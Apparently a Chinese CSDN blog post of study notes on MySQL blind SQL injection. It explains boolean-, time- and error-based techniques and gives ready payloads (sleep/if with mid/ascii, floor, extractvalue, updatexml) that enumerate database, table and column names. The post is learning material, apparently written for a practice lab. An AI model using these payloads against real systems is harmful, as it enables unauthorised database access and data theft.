小贤网安笔记(MySQL盲注)

已于 2023-12-17 21:48:20 修改
阅读量30 收藏
点赞数 1
文章标签: 笔记
于 2023-12-17 16:10:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75106836/article/details/135043585
版权

MySQL盲注

  mysql数据库网站后台语句:

select 查询数据

在网站应用中进行数据查询显示

例:select * from 表名 where id=$id

 insert 插入语句

在网站应用中进行用户注册添加等操作

例:insert into 表名(id,url,text) values(2,'x','$t')

 delete 删除数据

后台删除文章删除用户等操作

例:delete from 表名 where id=$id

 update 更新数据

后台数据同步或缓存等操作

例:update user set pwd='$p' where id=2 and username='admin'

 三种盲注方式

基于布尔的sql盲注—逻辑判断

regexplikeasciileftordmid

regexp '^xiaoxian[a-z]' #匹配xiaoxian以及xiaoxian...等

like 'x%'                         #判断x或x...是否成立

ord=ascii ascii(x)=97    #判断x的ascii码是否等于97

left(a,b)                          #从左侧截取a的前b位

mid(a,b,c)                      #从位置b开始,截取a字符串的c位

基于时间的sql盲注—延时判断

ifsleep

if(条件,5,0)                 #条件成立 返回5 否则 返回0

sleep(5)                     #sql语句延迟五秒执行

payload:

1.判断数据库名长度

id=1 and sleep(if(length(database())>=8,5,0)) --+

2.逐一判断数据库名 

id=1 and sleep(if(mid(database(),1,1)='s',5,0)) --+

也可以用ascii码判断(s的ascii码=115)

id=1 and sleep(if(ascii(mid(database(),1,1))=115,5,0)) --+

3.确定数据库名

id=1 and sleep(if(database()='security',5,0)) --+

 4.确定表名

id=1 and if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1)),1,1)=101,sleep(5),0) --+

limit 0,1 第一个表名

limit 1,1 第二个表名

limit 2,1 第三个表名

............

5.确定列名

id=1 and if(ascii(mid((select column_name from information_schema.columns where table_name='表名' limit 0,1)),1,1)=101,sleep(5),0) --+

基于报错的sql盲注—报错回显

floorypdatexmlextractvalue

参考:

concat() 函数            #将多个字符串连接成一个字符串

返回结果为连接参数产生的字符串;如有任何一个参数为NULL ,则返回值为 NULL

mysql> select concat('张三','李四','王五');
result> 张三李四王五

mysql> select concat('张三','李四',NULL);
result> NUll

1、通过floor报错注入语句如下:

payload:

usernamer=x' or(select 1 from(select count(*),concat((select(select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x)a) or '

 select concat()示意:

 

若想了解floor报错原理可前往Mysql报错注入之floor(rand(0)*2)报错原理探究-CSDN博客

2、通过ExtractValue报错注入语句如下:

payload:

usernamer=x' or extractvalue(1,concat(0x7e,version())) or '

3、通过UpdateXml报错注入语句如下:

payload:

usernamer=x' or updatexml(1,concat(0x7e,version())),0) or '


 

恋舟
关注
网安学习笔记(一)——SQL注入漏洞
qq_41599682的博客
06-17 652
此文为了仅为了帮助自己记录学习网络安全时的笔记。小白一枚,如有错误还望大佬指正。 SQL注入漏洞 原理 用户可控参数中注入SQL语法,破坏原有的SQL结构,达到编写程序时意料之外结果的攻击行为 原因 程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造了SQL语句。 未对用户可控参数进行足够的过滤便将参数内容拼接进入到语句之中。 SQL注入漏洞的关键条件:输入可控;原本要执行的代码拼接了输入 注入点 根据原理,在用户可控参数中注入SQL语法,也就是说只要web应用在获取用户数据的地
比较系统的web安全学习路线
yjwangan的博客
10-27 1395
比较系统的web安全学习路线
mysql盲注类型_盲注
weixin_29346059的博客
02-28 481
目录0X01 HTTP POST介绍0X02 POST基于时间的盲注0X03 POST基于布尔的盲注0X04 Sqlmap安全测试0X01 HTTP POST介绍POST 发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会向指定资源提交数据,请求服务器进行处理,如:表单数据提交、文件上传等,请求数据会被包含在请目录Sql注入什么是Sql注入呢?Sql注入有哪些例子?检索隐藏数据打破...
中北网安实训笔记-(20200623)-MYSQL(渗透测试课程)mysql详解、命令操作介绍
tonyhapply的博客
07-09 355
下期安排: burp suite修改包中数据或者当做代理使用 A:access数据(Windows)SQL server(微软) B: Oracle(甲骨文)大型数据库 MySQL 社区-》商业付费 C: Mariadb 社区多人维护(免费)Kali Linux A、B、C: 关系型数据库 作用:解决我们应用系统内的复杂关系(内存中部分存储) D: redis mongdb 非关系型数据库(内存中存储,读取速度快,突然断电可以备份数据,比较适合大数据) MySQL之父 Michael Widenius 1
网络安全学习笔记——ByPass绕过
just do it
05-13 681
MYSQL的substr第一位从1开始切割bypass即绕过,一般绕过是绕过防火墙,绕过waf,绕过本地的360,绕过网站的看门狗等waf检测机制其实很简单,核心就是正则匹配,虽然说还有字符串强行匹配,还有什么语义解析,但是实际上还是正则居多所有的网站都会与数据库交互,但不一定所有的网站都存在SQL注入漏洞,因为可以对输入的内容进行过滤特殊字符,关键字,空格等,一般都可以使用别的字符代替过滤空格时的绕过使用 /**/MySQL自定义的注释符当作一个函数php语言%0a。
2024年最新网络安全-Mysql注入知识点_length(database())(5),2024年最新非常适合收藏的网络安全进阶重难点笔记
2401_84264727的博客
05-06 1007
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
网安笔记:基础漏洞(面试篇)
CHAsichuan的博客
06-17 1686
网安必备的23个基础漏洞(超详细)
网安学习——web漏洞(上)
haoaaao的博客
02-13 2846
????????笔记来源????:11.WEB漏洞——SQL注入之必懂知识点 · 语雀 (这个博主笔记写的太详细了,看他的比看我自己的还有用,借用方便日后复习) 一、web漏洞必懂知识点 1、常见web漏洞的危害⚠️ (1)、sql注入 (2)、xss (3)、xxe???? (4)、文件上传 (5)、文件包含 (6)、文件读取 (7)、csrf(用户请求伪造) ...
Sqlmap常见用法
weixin_48118301的博客
06-19 1013
说明:本机IP:192.168.88.1,端口8086,以靶场sql-labs为例。
网络安全专业名词解释
aixmmmlll的博客
05-16 3936
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
【python】打造一款自动扫描全网漏洞的扫描器
热门推荐
浪子燕青的博客
04-25 2万+
这是一款和刘老师一起写的网安类别扫描器。基本原理是由Python+Mysql搭建的扫描器,实现自动无限永久爬行采集网站链接,自动化漏洞扫描检测。目的是挂机就能实现自动化发掘敏感情报,亦或是发现网站的漏洞或者隐藏可利用的漏洞。     早在17年11月份的时候就有这个想法,可是一直没有去做,后来快到除夕前几天才正式开始整个软件工程的设计。当时的想实现的功能比较简单,就是能做到无限采集到网站使用的CM
笔记)第三期书生·浦语大模型实战营(十一卷王场)–书生基础岛第5关---XTuner 微调个人小助手认知
最新发布
haidizym的博客
10-06 436
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1tz421B72y/课程文档:关卡作业:https://github.com/InternLM/Tutorial/blob/camp3/docs/L1/XTuner/task.md开发机平台:https://studio.intern-ai.org.cn/
C++学习笔记----8、掌握类与对象(四)---- 不同类型的数据成员(1)
weixin_71738303的博客
10-05 939
c++对于数据成员给了你许多选项。除了在类中声明简单的数据成员,可以生成静态数据成员供所有类的对象共享,const成员,引用成员,reference-to-const成员,等等。本节我们解释一下这些不同类型的数据成员的细节。
笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
haidizym的博客
10-02 558
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python。
强化学习笔记之【DDPG算法】
rvdgdsva的博客
10-06 843
强化学习第2篇.强化学习方向的学习者可以参考或者复刻
【韩顺平Java笔记】第6章:数组、排序和查找
随手写写
10-02 837
排序是将多个数据,依指定的顺序进行排列的过程。
【数学分析笔记】第4章第4节 复合函数求导法则及其应用(2)
随手写写
10-05 802
【例4.4.3】ye1cosx​,求y′【解】y′e1cosx​⋅21cosx​1​⋅−sinx−21cosx​sinx​e1cosx​yfxuxvx两边取对数得lnylnfxvxlnux等式两边同时对x求导得y1​y′uxvx1​y′v′xlnuxuxvx​u′xy′xuxvxv′xln。
MySQL基础操作与笔记
"MySQL笔记,包含了数据库连接、库级操作、表级操作等基础概念和命令,以及创建、查看和修改表的示例。" 在MySQL数据库管理中,笔记涵盖了一系列核心概念和常用命令,这对于理解和操作MySQL至关重要。首先,笔记...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值